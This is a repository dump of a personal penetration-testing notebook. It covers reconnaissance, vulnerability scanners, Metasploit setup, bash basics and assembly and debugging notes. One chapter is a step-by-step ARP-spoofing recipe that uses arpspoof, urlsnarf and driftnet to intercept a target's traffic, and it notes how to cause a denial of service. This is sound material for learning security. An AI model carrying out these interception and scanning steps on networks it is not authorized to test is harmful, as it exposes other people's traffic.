├── .gitignore
├── README.md
├── SUMMARY.md
├── active_information_gathering.md
├── arp-spoofing.md
├── attacking_the_user.md
├── automated_vulnerability_scanners.md
├── bash-scripting.md
├── basics.md
├── basics_of_linux.md
├── basics_of_windows.md
├── binary_exploitation.md
├── binary_exploitation2.md
├── broken_authentication_or_session_management.md
├── browser_vulnerabilities.md
├── buffer_overflow_bof.md
├── bypass_image_upload.md
├── bypassing_antivirus.md
├── clean_up.md
├── clickjacking.md
├── cmd.md
├── commands.md
├── common_web-services.md
├── compiling-windows-exploits.md
├── connections.md
├── create_shellcode.md
├── creating_malicious_files.md
├── cross-site-scripting.md
├── cross_site_request_forgery.md
├── dGaQO6Y.png
├── database.md
├── default_layout_apache_on_different_versiont.md
├── dictionary_attacks.md
├── directory-traversal-attack.md
├── dns-spoofing.md
├── dns_basics.md
├── dns_zone_transfer_attack.md
├── dom-based-xss.md
├── editing-exploits.md
├── email_harvesting.md
├── escaping_restricted_shell.md
├── example_of_company_architecture.md
├── examplesXSS.md
├── exploit-examples_2.md
├── exploit_examples_and_tutorials.md
├── exploiting.md
├── exploits.md
├── exposed_version_control.md
├── failure-to-restrict-url-access.md
├── find_subdomains.md
├── finding_subdomains.md
├── firewalls.md
├── fss.jpg
├── function1-stackframe.png
├── function1.png
├── general_tips.md
├── generate_custom_wordlist.md
├── getting_meterpreter_shell.md
├── google_hacking.md
├── hashcat.md
├── host-header-attack.md
├── html-injection.md
├── identify_hash_and_crack_it.md
├── identifying-technology-stack.md
├── immunity_debugger.md
├── insecure-direct-object-reference-idor.md
├── java_applet.md
├── lead_to_compromise.md
├── linux.md
├── list_of_common_ports.md
├── littearature.md
├── local_file_inclusion.md
├── loot.md
├── loot_windows_-_for_credentials_and_other_stuff.md
├── main-stackframe.png
├── metasploit.md
├── meterpreter.md
├── modules.md
├── msfvenom---create-shellcode.md
├── netcat.md
├── network_traffic.md
├── networking.md
├── nosql-injections.md
├── online_password_cracking.md
├── oscp.md
├── pass_the_hash_-_reusing_hashes.md
├── passive_information_gatherig.md
├── password-cracking.md
├── payloads.md
├── persistence.md
├── physical_access_to_machine.md
├── pivoting.md
├── port_forwarding_and_tunneling.md
├── port_knocking.md
├── port_scanning.md
├── post_exploitation.md
├── powershell.md
├── powershell_scripting2.md
├── privilege-escalation-powershell.md
├── privilege_escalation_-_linux.md
├── privilege_escalation_windows.md
├── python_fundamentals.md
├── random-stuff.md
├── recon-ng.md
├── remote_file_inclusion.md
├── reverse-shell.md
├── scanning.md
├── scripting_with_python.md
├── server-side-vulnerabilities.md
├── session-fixation.md
├── setuid_c-code.md
├── smtp-user-enum.md
├── social_engineering_-_phishing.md
├── spawning_shells.md
├── sql-injections.md
├── ssl-strip.md
├── styles
    ├── ebook.css
    ├── print.css
    └── website.css
├── subdomain_takeover.md
├── tcp-dumps_on_pwnd_machines.md
├── text-injection.md
├── the_basics.md
├── tips.md
├── tools.md
├── tools_of_the_trade.md
├── transfering_files.md
├── transfering_files2.md
├── transfering_files_to_windows.md
├── users.md
├── vim.md
├── vulnerabilities.md
├── vulnerability_analysi.md
├── vulnerability_analysi1s.md
├── vulnerability_analysis.md
├── waf_-_web_application_firewall.md
├── web-scanning.md
├── web-services.md
├── webshell.md
├── wep.md
├── wget.md
├── wifi.md
├── windows.md
├── windows_exploitation.md
├── wireshark.md
├── wps.md
├── write_exploits.md
└── xml_external_entity_attack.md


/.gitignore:
--------------------------------------------------------------------------------
 1 | # Node rules:
 2 | ## Grunt intermediate storage (http://gruntjs.com/creating-plugins#storing-task-files)
 3 | .grunt
 4 | 
 5 | ## Dependency directory
 6 | ## Commenting this out is preferred by some people, see
 7 | ## https://docs.npmjs.com/misc/faq#should-i-check-my-node_modules-folder-into-git
 8 | node_modules
 9 | 
10 | # Book build output
11 | _book
12 | 
13 | # eBook build output
14 | *.epub
15 | *.mobi
16 | *.pdf


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # IT-Security
 2 | 
 3 | My notepad about stuff related to IT-security, and specifically penetration testing. Stuff I have come across that I don't feel like googeling again.
 4 | 
 5 | I have used this book to try to write down how some things work, but at the same time I want to use it as a reference book to find commands and things I just can't remember. Therefore I have tried to create a TLDR section in the beginning of some chapters where I have copy-paste ready commands that are useful. And if you want to know more you can continue to read the rest of the chapter. This is my way of making the book a hybrid between the Red Team Field Manual and a standard introduction book to pentesting.
 6 | 
 7 | Also, this book is just a collection of stuff that is available on the interwebz. I am just a simple collector. I have tried to include a reference section to show where I found the technique. This book is my way of trying to give something back to the infosec community and I hope it can be useful to someone.
 8 | 
 9 | You can read this book on [https://pha5matis.gitbooks.io/netsec/content/](https://pha5matis.gitbooks.io/netsec/content/). If you feel like contributing, or just forking it, you can do that from its github repo here: [https://github.com/pha5matis/Pentesting-Guide](https://github.com/pha5matis/Pentesting-Guide). If you feel like this is a good start, but you want to add and remove things and just make it yours you can just fork it and do whatever you want with it.
10 | 
11 | ## Find practical examples
12 | 
13 | If you read about a vulnerability that you want to know more about I can really recommend searching for in on HackerOne via google. It is a good way to find real life examples of vulnerabilities.
14 | 
15 | Here is an example of such a search:
16 | 
17 | ```
18 | site:hackerone.com sql-injection
19 | ```
20 | 
21 | ## Disclaimers
22 | 
23 | Sometimes the line isn't very clear between the chapters. Some actions might be considered part of the vulnerability analysis-phase, but it could also but considered part of the recon-phase. It is what it is.
24 | 
25 | Use at own risk.
26 | 


--------------------------------------------------------------------------------
/SUMMARY.md:
--------------------------------------------------------------------------------
  1 | # Summary
  2 | 
  3 | * [Introduction](README.md)
  4 | * [The Basics](the_basics.md)
  5 |   * [Linux](linux.md)
  6 |     * [Basics of Linux](basics_of_linux.md)
  7 |     * [Bash-scripting](bash-scripting.md)
  8 |     * [Vim](vim.md)
  9 |   * [Windows](windows.md)
 10 |     * [Basics of Windows](basics_of_windows.md)
 11 |     * [PowerShell](powershell.md)
 12 |     * [PowerShell Scripting](powershell_scripting2.md)
 13 |     * [CMD](cmd.md)
 14 |   * [Scripting With Python](scripting_with_python.md)
 15 |     * [Python Fundamentals](python_fundamentals.md)
 16 |     * [Useful Scripts](connections.md)
 17 |   * [Transferring Files](transfering_files2.md)
 18 |     * [Transfering Files on Linux](transfering_files.md)
 19 |     * [Transfering files on Windows](transfering_files_to_windows.md)
 20 |   * [Firewalls](firewalls.md)
 21 |   * [General tips and tricks](general_tips.md)
 22 | * [Recon and Information Gathering Phase](scanning.md)
 23 |   * [Passive Information Gatherig](passive_information_gatherig.md)
 24 |     * Identify IP-addresses and Subdomains
 25 |       * Identify IP-addresses
 26 |       * [Find Subdomains](find_subdomains.md)
 27 |         * [DNS Basics](dns_basics.md)
 28 |         * [Finding subdomains](finding_subdomains.md)
 29 |         * [DNS Zone Transfer Attack](dns_zone_transfer_attack.md)
 30 |     * [Identifying People](email_harvesting.md)
 31 |     * [Search Engine Discovery](google_hacking.md)
 32 |     * [Identifying Technology Stack](identifying-technology-stack.md)
 33 |   * [Active Information Gathering](active_information_gathering.md)
 34 |     * [Port Scanning](port_scanning.md)
 35 | * [Vulnerability analysis](vulnerability_analysi1s.md)
 36 |   * [Non-HTTP Vulnerabilities](server-side-vulnerabilities.md)
 37 |     * [Common ports\/services and how to use them](list_of_common_ports.md)
 38 |     * [Port Knocking](port_knocking.md)
 39 |   * [HTTP - Web Vulnerabilities](web-services.md)
 40 |     * [Common Web-services](common_web-services.md)
 41 |     * [WAF - Web Application Firewall](waf_-_web_application_firewall.md)
 42 |     * [Attacking the System](lead_to_compromise.md)
 43 |       * [Local File Inclusion](local_file_inclusion.md)
 44 |       * [Remote File Inclusion](remote_file_inclusion.md)
 45 |       * [Directory Traversal Attack](directory-traversal-attack.md)
 46 |       * [Hidden Files and Directories](web-scanning.md)
 47 |       * [SQL-Injections](sql-injections.md)
 48 |       * [Nosql-Injections](nosql-injections.md)
 49 |       * [XML External Entity Attack](xml_external_entity_attack.md)
 50 |       * [Bypass File Upload Filtering](bypass_image_upload.md)
 51 |       * [Exposed Version Control](exposed_version_control.md)
 52 |       * Directory Traversal Attack
 53 |       * [Host Header Attack](host-header-attack.md)
 54 |     * [Attacking the User](attacking_the_user.md)
 55 |       * [Clickjacking](clickjacking.md)
 56 |       * [Broken Authentication or Session Management](broken_authentication_or_session_management.md)
 57 |       * [Text/content-injection](text-injection.md)
 58 |       * [HTML-Injection](html-injection.md)
 59 |       * [Insecure Direct Object Reference \(IDOR\)](insecure-direct-object-reference-idor.md)
 60 |       * [Subdomain Takeover](subdomain_takeover.md)
 61 |       * [Cross Site Request Forgery](cross_site_request_forgery.md)
 62 |       * [Cross-Site Scripting](cross-site-scripting.md)
 63 |         * [Examples](examplesXSS.md)
 64 |         * [DOM-based XSS](dom-based-xss.md)
 65 |       * [Browser Vulnerabilities](browser_vulnerabilities.md)
 66 |       * HTML-Injection
 67 |       * [Session Fixation](session-fixation.md)
 68 |   * [Automated Vulnerability Scanners](automated_vulnerability_scanners.md)
 69 | * [Exploiting](exploiting.md)
 70 |   * [Social Engineering - Phishing](social_engineering_-_phishing.md)
 71 |   * [Default Layout of Apache on Different Versions](default_layout_apache_on_different_versiont.md)
 72 |   * [Shells](reverse-shell.md)
 73 |   * [Webshell](webshell.md)
 74 |   * [Generate Shellcode](create_shellcode.md)
 75 |   * [Editing Exploits](editing-exploits.md)
 76 |   * [Compiling windows exploits](compiling-windows-exploits.md)
 77 | * [Post Exploitation](post_exploitation.md)
 78 |   * [Spawning Shells](spawning_shells.md)
 79 |   * [Meterpreter for Post-Exploitation](getting_meterpreter_shell.md)
 80 |   * [Privilege Escalation - Linux](privilege_escalation_-_linux.md)
 81 |   * [Privilege Escalation - Windows](privilege_escalation_windows.md)
 82 |   * [Privilege Escalation - Powershell](privilege-escalation-powershell.md)
 83 |   * [Escaping Restricted Shell](escaping_restricted_shell.md)
 84 |   * [Bypassing antivirus](bypassing_antivirus.md)
 85 |   * [Loot and Enumerate](loot.md)
 86 |     * [Loot Windows](loot_windows_-_for_credentials_and_other_stuff.md)
 87 |     * [Loot Linux](tcp-dumps_on_pwnd_machines.md)
 88 |   * [Persistence](persistence.md)
 89 |   * [Cover your tracks](clean_up.md)
 90 | * [Password Cracking](password-cracking.md)
 91 |   * [Generate Custom Wordlist](generate_custom_wordlist.md)
 92 |   * [Offline Password Cracking](identify_hash_and_crack_it.md)
 93 |   * [Online Password Cracking](online_password_cracking.md)
 94 |   * [Pass the Hash - Reusing Hashes](pass_the_hash_-_reusing_hashes.md)
 95 | * [Pivoting - Port forwarding - Tunneling](port_forwarding_and_tunneling.md)
 96 | * [Network traffic analysis](network_traffic.md)
 97 |   * [Arp-spoofing](arp-spoofing.md)
 98 |     * [SSL-strip](ssl-strip.md)
 99 |   * [DNS-spoofing](dns-spoofing.md)
100 |   * [Wireshark](wireshark.md)
101 | * [Wifi](wifi.md)
102 |   * [WEP](wep.md)
103 |   * [WPS](wps.md)
104 | * [Physical access to machine](physical_access_to_machine.md)
105 | * [Literature](littearature.md)
106 | 
107 | 


--------------------------------------------------------------------------------
/active_information_gathering.md:
--------------------------------------------------------------------------------
 1 | # Active information gathering
 2 | 
 3 | 
 4 | Once the passive phase is over it is time to move to the active phase. In this phase we start interacting with the target.
 5 | 
 6 | 
 7 | 
 8 | ## Netdiscover
 9 | 
10 | This tool is used to scan a network for live machines.
11 | 
12 | ```
13 | netdiscover -r 192.168.1.1/24
14 | ```
15 | 
16 | ## Nikto
17 | 
18 | Nikto is a good tool to scan webservers. It is very intrusive.
19 | 
20 | ```
21 | nikto -host 192.168.1.101
22 | ```
23 | 
24 | 
25 | 
26 | ## References
27 | 
28 | https://blog.bugcrowd.com/discovering-subdomains
29 | 
30 | https://high54security.blogspot.cl/2016/01/recon-ng-and-power-to-crawl-trough.html
31 | 
32 | 


--------------------------------------------------------------------------------
/arp-spoofing.md:
--------------------------------------------------------------------------------
 1 | # Arp-spoofing - Sniffing traffic
 2 | 
 3 | 
 4 | 
 5 | 
 6 | ## Step 1
 7 | 
 8 | Run nmap or netdiscover to list the devices on the network.
 9 | `netdiscover -r 192.168.1.0/24` or whatever network range it is. This is good because it is live, and it updates as soon as new devices connect to the network.
10 | 
11 | ```
12 | nmap -vvv 192.168.1.0/24
13 | ```
14 | 
15 | ## Step 2 
16 | 
17 | ```
18 | echo 1 > /proc/sys/net/ipv4/ip_forward
19 | ``` 
20 | 
21 | this command is fundamental. Without changing it to `1`you will only block the traffic, but not forward it. So that will bring down the connection for that person. Denial of service. If you want to do that make sure it is set to 0. If you want to intercept it make sure it is set to 1.
22 | 
23 | ## Step 3
24 | 
25 | ```
26 | arpspoof -i wlan0 -t 192.168.1.1 192.168.1.105
27 | ```
28 | 
29 |  - `-i` is the interface flag. In this example we choose the wlan0 interface. Run `ifconfig` to see which interfaces you have available.
30 |  - `-t` the target flag. It specifies your target. The first address is the router, and the second is the specific device you want to target.
31 | 
32 | 
33 | ## Step 4 - Read the traffic
34 | 
35 | So now you are intercepting the traffic. You have a few choices how to read it. 
36 | Use urlsnarf. 
37 | 
38 | ```
39 | urlsnarf -i wlan0
40 | ``` 
41 | 
42 | it will output all URLs.
43 | 
44 | ```
45 | driftnet -i wlan0
46 | ```
47 | 
48 | Driftnet is pretty cool. It let's you see all the images that is loaded in the targets browser in real time. Not very useful, but kind of cool.
49 |  - wireshark. Just open wireshark and select the interface and start capturing.
50 |  - Tcpdump. Also awesome.
51 | 


--------------------------------------------------------------------------------
/attacking_the_user.md:
--------------------------------------------------------------------------------
1 | # Attacking the user
2 | 
3 | In this section we focus on vectors that attack the user. These kinds of vulnerabilities seems to be popular with in bug bounties.


--------------------------------------------------------------------------------
/automated_vulnerability_scanners.md:
--------------------------------------------------------------------------------
  1 | # Automated Vulnerability Scanners
  2 | 
  3 | Everyone on the interwebz that says they know something about pentesting will talk shit about nessus and say that it is for lazy pentesters, it creates too much noise, and that it produces too many false positives. That may be true, I don't know. But from a learning perspective it can be really great. It can help to show you what kind of vulnerabilities are out there. So whatever, do what you want. 
  4 | 
  5 | ## Server side scanning
  6 | 
  7 | ### Nessus
  8 | 
  9 | Register and download it here.
 10 | http://www.tenable.com/products/nessus-home
 11 | 
 12 | Then
 13 | ```
 14 | dpkg -i nameOfFile
 15 | ```
 16 | 
 17 | Start it
 18 | ```
 19 | /etc/init.d/nessusd start
 20 | ```
 21 | 
 22 | ### Nmap Scripting Engine
 23 | 
 24 | 
 25 | Scripts are found on kali at:
 26 | 
 27 | ```
 28 | /usr/share/nmap/scripts
 29 | ```
 30 | 
 31 | ```
 32 | nmap --script-help default
 33 | ```
 34 | 
 35 | Or for a specific script:
 36 | 
 37 | ```
 38 | nmap --script-help nameOfScript
 39 | ```
 40 | 
 41 | Run all default scripts together with a port-scan. These scripts could possibily crash certain servers. Causing a denial-of-service. So never run this on production servers.
 42 | ```
 43 | nmap -sC 192.168.1.101
 44 | ```
 45 | 
 46 | Nmap has categoriesed their scripts into several different categories to make it easier to run a few of them together
 47 | 
 48 | ```
 49 | uth
 50 | broadcast
 51 | default
 52 | discovery
 53 | dos
 54 | exploit
 55 | external
 56 | fuzzer
 57 | intrusive
 58 | malware
 59 | safe, 
 60 | version
 61 | vuln
 62 | ```
 63 | 
 64 | So if you want to test all the vuln-scripts you do
 65 | 
 66 | ```
 67 | nmap 192.168.1.10 -sC vuln
 68 | ```
 69 | 
 70 | ### OpenVas
 71 | 
 72 | OpenVas is another popular open-soruce vulnerability scanner. 
 73 | 
 74 | If you are on Kali linux you have to firt run the initial setup scripts, like this
 75 | 
 76 | ```
 77 | openvas-setup
 78 | ```
 79 | Make sure to write down the password that the initialisation-scripts gives you
 80 | 
 81 | This will download some stuff and start setting everything up. WHen everything is set up you go to the web-interface:
 82 | 
 83 | ```
 84 | https://127.0.0.1:9392/login/login.html
 85 | ```
 86 | 
 87 | 
 88 | ### Metasploit Scanner Module
 89 | 
 90 | 
 91 | ## Web Application Scanner
 92 | 
 93 | ###  Nikto
 94 | 
 95 | ```
 96 | nikto -h example.com
 97 | ```
 98 | 
 99 | ### Uniscan
100 | 
101 | 
102 | ```
103 | uniscan -h 192.168.1.102
104 | ```
105 | 
106 | ### Metasploit - Wamp
107 | 
108 | Found in metasploit
109 | 
110 | ```
111 | load wamp
112 | help
113 | ```
114 | Read more here
115 | https://www.offensive-security.com/metasploit-unleashed/wmap-web-scanner/


--------------------------------------------------------------------------------
/bash-scripting.md:
--------------------------------------------------------------------------------
  1 | # Bash-scripting
  2 | 
  3 | ## Iterate over a file
  4 | 
  5 | This script will iterate over a file and echo out every single line:
  6 | 
  7 | ```bash
  8 | #!/bin/bash
  9 | 
 10 | for line in $(cat file.txt);do
 11 |     echo $line
 12 | done
 13 | ```
 14 | 
 15 | Another way of writing is this:
 16 | 
 17 | ```bash
 18 | #!/bin/bash
 19 | 
 20 | while read p; do
 21 |     echo  $p
 22 | done <file.txt
 23 | ```
 24 | 
 25 | ## For-loops
 26 | 
 27 | ```bash
 28 | #!/bin/bash
 29 | 
 30 | for ((i = 0; i < 10; i++)); do
 31 |     echo $i
 32 | done
 33 | ```
 34 | 
 35 | Another way to write this is by using the program `seq`. Seq is pretty much like `range()` in python. So it can be used like this:
 36 | 
 37 | ```bash
 38 | #!/bin/bash
 39 | 
 40 | for x in `seq 1 100`; do
 41 |     echo $x
 42 | done
 43 | ```
 44 | 
 45 | ## If statement
 46 | 
 47 | `$1` here represent the first argument.
 48 | 
 49 | ```bash
 50 | 
 51 | if [ "$1" == "" ]; then
 52 |     echo "This happens"
 53 | fi
 54 | ```
 55 | 
 56 | ## If/Else
 57 | 
 58 | ```bash
 59 | #!/bin/bash
 60 | 
 61 | if [ "$1" == "" ]; then
 62 |     echo "This happens"
 63 | else
 64 |     echo "Something else happens"
 65 | fi
 66 | ```
 67 | 
 68 | 
 69 | ## Command line arguments
 70 | 
 71 | Command line arguments are represented like this
 72 | 
 73 | ```bash
 74 | #!/bin/bash
 75 | 
 76 | $1
 77 | ```
 78 | This is the first command line argument.
 79 | 
 80 | ## Daemonize an execution
 81 | 
 82 | If you do a ping-sweep with host the command will take about a second to complete. And if you run that against 255 hosts I will take a long time to complete. To avoid this we can just deamonize every execution to make it faster. We use the `&` to daemonize it.
 83 | 
 84 | ```bash
 85 | #!/bin/bash
 86 | 
 87 | for ip in $(cat ips.txt); do
 88 |     ping -c 1 $ip &
 89 | done
 90 | ```
 91 | 
 92 | 
 93 | ## Use the output of command
 94 | 
 95 | It has happened to me several times that I want to input the output of a command into a new command, for example:
 96 | 
 97 | I search for a file, find three, and take the last line, which is a path. Now I want to cat that path:
 98 | 
 99 | ```bash
100 | #!/bin/bash
101 | 
102 | locate 646.c | tail -n 1
103 | ```
104 | 
105 | This can be done like this:
106 | 
107 | ```bash
108 | #!/bin/bash
109 | 
110 | cat $(locate 646.c | tail -n 1)
111 | ```
112 | 
113 | 
114 | 


--------------------------------------------------------------------------------
/basics.md:
--------------------------------------------------------------------------------
 1 | # Basics
 2 | 
 3 | 
 4 | 
 5 | ## Set up fast cache search
 6 | 
 7 | If you try to search in metasploit it will tell you that it uses slow search. Because it hasn't build up the cache. To solve this we have to run
 8 | 
 9 | ```
10 | msfdb init
11 | ```
12 | 
13 | Then we wait a few minutes. And then check to see if the databse is connected.
14 | First we enter 
15 | ```
16 | msfconsole
17 | db_status
18 | ```
19 | 
20 | It should say that the database is connected. If it is, then we run:
21 | 
22 | ```
23 | msfconsole
24 | db_rebuild_cache
25 | ```
26 | 
27 | 
28 | 
29 | It will take a few minutes. And then you will be able to use fast search.
30 | 
31 | ## Exploits
32 | 
33 | An exploit is a module that has a payload.
34 | An explout without a payload is a auxiliary module.
35 | 
36 | 
37 | ```
38 | msfconsole
39 | ```
40 | 
41 | Exploits are graded from something to excellent. Exploits that are excellent should not crash the system you try to exploit.
42 | 
43 | 
44 | You can either find modules right in metasplot, or on their website: http://www.rapid7.com/db/modules
45 | 
46 | ### Msfcli
47 | Msfcli has been deprecated and you should use the `-x`option in msfconsole instead.
48 | 
49 | 
50 | ### Msfconsole
51 | 
52 | Msfconsole is where we usually work. This is the most common metasploit interface.
53 | 
54 | ### Update metasploit
55 | 
56 | ```
57 | msfupdate
58 | ```
59 | 
60 | ### Search in metasploit
61 | 
62 | ```
63 | searchsploit
64 | ```
65 | 
66 | ## 


--------------------------------------------------------------------------------
/binary_exploitation.md:
--------------------------------------------------------------------------------
1 | # The Basics of Assembly
2 | 
3 | https://www.recurse.com/blog/7-understanding-c-by-learning-assembly
4 | 
5 | http://althing.cs.dartmouth.edu/local/www.acm.uiuc.edu/sigmil/RevEng/ch06.html
6 | 
7 | 
8 | https://brianslam.wordpress.com/2014/04/06/assembly-is-fun-sort-of/
9 | 


--------------------------------------------------------------------------------
/binary_exploitation2.md:
--------------------------------------------------------------------------------
  1 | # Binary exploits
  2 | 
  3 | Binary exploits can be used for a lot of different things. It can be used to find vulnerabilities in most programs. 
  4 | 
  5 | The hacker knows that it is not the code written by the programmer that gets executed by the computer. Since a program is compiled into machine-code it is actully the machine code that gets executed. And the human readable representation of machine code is assembly. So yeah, let's learn some assembly.
  6 | 
  7 | A lot in this chapter is just my notes from reading **Hacking - The Art of Exploitation**. So if you really want to learn binary exploitation you should probably stop reading here and just pick up that book instead, it is a lot better. 
  8 | 
  9 | ### What's up with all the hexadecimal?
 10 | Hexadecimal is a base 16 counting system. 0-9 plus A-F. So the numbers are, 0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f. So we can count to 16 without using two digits. 
 11 | So F == 16
 12 | This is pretty convenient because one byte is made up of 8 bits. And with 8 bits (0 and 1) you. 
 13 |  can form 256 (2^8) different values. So two hexadecimal digits can represent values up to 256. Just like two decimal digits can represent value up to 99.
 14 |  
 15 |  So two hexadecimal digits can represent any byte value. So one byte can be translated into a two digit hexadecimal value.
 16 |  
 17 |  ```
 18 |  01, 02, 03, 04, 05, 06, 07, 08, 09, 10, 11, 12, 13, 14....
 19 |  a0,a1, a2, a3, a4...
 20 |  f0, f1, f2, f3...
 21 |  ```
 22 |  And so on. 
 23 |  
 24 |  ## Memory address
 25 | 
 26 | So in order to analyze assembly we are going to write a short program in C.
 27 | 
 28 | ```c
 29 | #include <stdio.h>
 30 | 
 31 | int main(){
 32 | 
 33 |   for (size_t i = 0; i < 10; i++) {
 34 |     puts("Hello world");
 35 |   }
 36 | 
 37 |   return 0;
 38 | }
 39 | ```
 40 | 
 41 | So we have written a program in C and then compiled it. Now we want to look at the assembly code so see what code is actually going to be run by the machine.
 42 |  
 43 |  ```
 44 |  objdump -D programName
 45 |  ```
 46 |  
 47 |  This will give us som crazy output like this
 48 |  
 49 |  ```assembly
 50 |  00000000004004e6 <main>:
 51 |   4004e6:	55                   	push   %rbp
 52 |   4004e7:	48 89 e5             	mov    %rsp,%rbp
 53 |   4004ea:	48 83 ec 10          	sub    $0x10,%rsp
 54 |   4004ee:	48 c7 45 f8 00 00 00 	movq   $0x0,-0x8(%rbp)
 55 |   4004f5:	00 
 56 |   4004f6:	eb 0f                	jmp    400507 <main+0x21>
 57 |   4004f8:	bf a4 05 40 00       	mov    $0x4005a4,%edi
 58 |   4004fd:	e8 be fe ff ff       	callq  4003c0 <puts@plt>
 59 |   400502:	48 83 45 f8 01       	addq   $0x1,-0x8(%rbp)
 60 |   400507:	48 83 7d f8 09       	cmpq   $0x9,-0x8(%rbp)
 61 |   40050c:	76 ea                	jbe    4004f8 <main+0x12>
 62 |   40050e:	b8 00 00 00 00       	mov    $0x0,%eax
 63 |   400513:	c9                   	leaveq 
 64 |   400514:	c3                   	retq   
 65 |   400515:	66 2e 0f 1f 84 00 00 	nopw   %cs:0x0(%rax,%rax,1)
 66 |   40051c:	00 00 00 
 67 |   40051f:	90                   	nop
 68 | ```
 69 | This is just the part about the main-function of the program. The output is a lot more, but that's not interesting to us at the time.
 70 | 
 71 | `00000000004004e6` This number represents a place in memory. It is like an address. It could be written in base 10 if we wanted to. And it would still be the correct address. But out of the convenience describes about the address is written in hexadecimal. So the address is 16 digits. That is because the binary is a 64 bit addressing schema. So a 64-bit process can have 2^64
 72 | (1.84467441 × 10^19) memory addresses.
 73 | 
 74 | So on the first line after the main-line we see the number 55. All these numbers are actually machine-code, but instead of writing it in binary (01010101010101101) it is written in hexadecimal. The mnemonics to the right of those numbers are the instructions written in assembly. They are written so that we, humans, can understand it a bit easier. Instead of having to remember that 90 means nop. We just have to remember nop. So that's great. Makes it a lot easier to understand machine code.
 75 | 
 76 | So instead of having to memorize `10010000` it is represented as `90` in hexadecimal. And instead of having to remember `90` in hexadecimal we just have to remember `nop`. Pretty great. But in the end they mean the same thing, they are just represented in three different ways.
 77 | 
 78 | ### AT&T Syntaxt or Intel Syntax
 79 | There are basically two types of assembly language representation, it is the: AT&T syntax and the Intel syntax. The AT&T syntax is the default syntax in linux distributions. So when we run objdump, like the example above, it is in AT&T syntax. And we can tell that it is AT&T because it has all those $ and % signs. If you add the `-M intel` to you objdump command you will see the output in Intel-syntax. But in the end, it doesn't really matter, tomato tomato.
 80 | 
 81 | We can set the syntax in gdb with the following command: 
 82 | ```
 83 | set dis intel
 84 | #or
 85 | set disassembly-flavor intel
 86 | ```
 87 | 
 88 | ### Registers
 89 | 
 90 |  Okay, so the processor in your computers has something called registers. Registers are like internal variables for your processor. They are predefined, in the sense that you can't create registers. They are already there. You can think of them as like micro-memories, or just variables. They are used by the processor to make stuff faster, instead of having to look up a specific place in the memory it has its own micro-memory. There are only 16 registers available on x86 processors. So it is not that much to remember. The names of the registers are a bit different between 64 bit processors and 32 bit. A 64bit processor can run 32 bit binaries, but 32 bit processors can't run 64 bit binaries. If you want to know what type a binary is you just type 
 91 |  ```
 92 |  file binaryName
 93 |  ```
 94 |  
 95 | These are the names for 32 bit registers. And they are divided into sub-groups.
 96 |  
 97 |  **General registers**
 98 |  These registers are mainly used for like temporary memory for the processor. 
 99 | 
100 | EAX - Accumulator
101 | 
102 | EBX - Base
103 | 
104 | ECX - Counter
105 | 
106 | EDX - Data
107 | 
108 | 
109 | **Index and pointers**
110 | ESI - Source index
111 | 
112 | EDI - Destination index
113 | 
114 | EBP - Base pointer - This one stores an address in its little micro-memory. 
115 | 
116 | EIP - Instruction pointer. Like a child points his finger on each word it reads in a book, the instruction pointer is that finger. It always points to the current instruction the processor is reading. This is a an important pointer.
117 | 
118 | ESP - Stack pointer - This one also stores an address.
119 | 
120 | 
121 | **Segment registers**
122 | CS
123 | 
124 | DS
125 | 
126 | ES
127 | 
128 | FS
129 | 
130 | GS
131 | 
132 | SS
133 | 
134 | 
135 | **Indicator**
136 | EFLAGS
137 |  
138 | So let's take a look at them in a real program. Let's run the program above but this time with a debugger, the Gnu Debugger.
139 | 
140 | ```
141 | gdb -q ./myprogram
142 | ```
143 | 
144 | First we set a breakpoint with the command: `break main` to stop the program right before the main-function is run. Then we type `info registers` to see what we got with our registers.
145 | 
146 | ```
147 | Breakpoint 1, 0x00000000004004ea in main ()
148 | (gdb) info registers
149 | #### General registers
150 | rax            0x4004e6	4195558
151 | rbx            0x0	0
152 | rcx            0x0	0
153 | rdx            0x7fffffffe798	140737488349080
154 | 
155 | #### Index and pointers
156 | rsi            0x7fffffffe788	140737488349064
157 | rdi            0x1	1
158 | rbp            0x7fffffffe6a0	0x7fffffffe6a0
159 | rsp            0x7fffffffe6a0	0x7fffffffe6a0
160 | r8             0x400590	4195728
161 | r9             0x7ffff7dea6d0	140737351952080
162 | r10            0x83e	2110
163 | r11            0x7ffff7a57520	140737348203808
164 | r12            0x4003f0	4195312
165 | r13            0x7fffffffe780	140737488349056
166 | r14            0x0	0
167 | r15            0x0	0
168 | rip            0x4004ea	0x4004ea <main+4>
169 | 
170 | #### Indicator
171 | eflags         0x246	[ PF ZF IF ]
172 | 
173 | #### Segment registers
174 | cs             0x33	51
175 | ss             0x2b	43
176 | ds             0x0	0
177 | es             0x0	0
178 | fs             0x0	0
179 | ```
180 |  
181 |  So hexadecimal is used as a way to represent binary out of convenience. 
182 |  
183 |  So assembly is written in the following form:
184 |  ```
185 |  mnemonic    destination,source
186 |  ```
187 | The mnemonics are instructions like: mov, push, sub
188 | The destination and source are registers, addresses in memories, or values.
189 | 
190 | ### Mnemonics
191 | ```assembly
192 | mov    rbp,rsp
193 | ```
194 | 
195 | So here we move the current value in rsp (stack pointer) to rbp (base pointer). This is pretty standard in the beginning of a program. We take the stack-pointer and say that it is equal to the base-pointer for now. 
196 | 
197 | ```
198 | sub    rsp,0x10
199 | ```
200 | Here we read: Subtract 0x10 from rsp. So Stack-pointer register is now equal to what it was before minus 0x10.
201 | 
202 | ```
203 | add/inc ;add or increment
204 | ```
205 | 
206 | 
207 | #### Flow control
208 | 
209 | ```
210 | cmp ; is used to compare values.
211 | jmp ; jump to a different part of the program.
212 | ```
213 | 
214 | For example
215 | ```
216 | cmp    QWORD PTR [rbp-0x8],0x9
217 | jbe    4004f8 <main+0x12>
218 | ```
219 | Here we are making a comparison. Compare rbp-0x8 ==? 0x9. And **jbe** stands for jump if below or equal. I am guessing that is the loop. Then we have an address: **4004f8** which is the address to the point in the program where the loop is initiated. So it makes a comparison and if it is false it jumps to the beginning of the loop. 
220 | 
221 | 
222 | 
223 | ## Vulnerable functions
224 | ### access()
225 | Notes
226 | 
227 | Warning: Using access() to check if a user is authorized to, for example, open a file before actually doing so using open(2) creates a security hole, because the user might exploit the short time interval between checking and opening the file to manipulate it. For this reason, the use of this system call should be avoided. (In the example just described, a safer alternative would be to temporarily switch the process's effective user ID to the real ID and then call open(2).)
228 | 
229 | 
230 | http://linux.die.net/man/2/access


--------------------------------------------------------------------------------
/broken_authentication_or_session_management.md:
--------------------------------------------------------------------------------
 1 | # Broken Authentication or Session Management
 2 | 
 3 | 
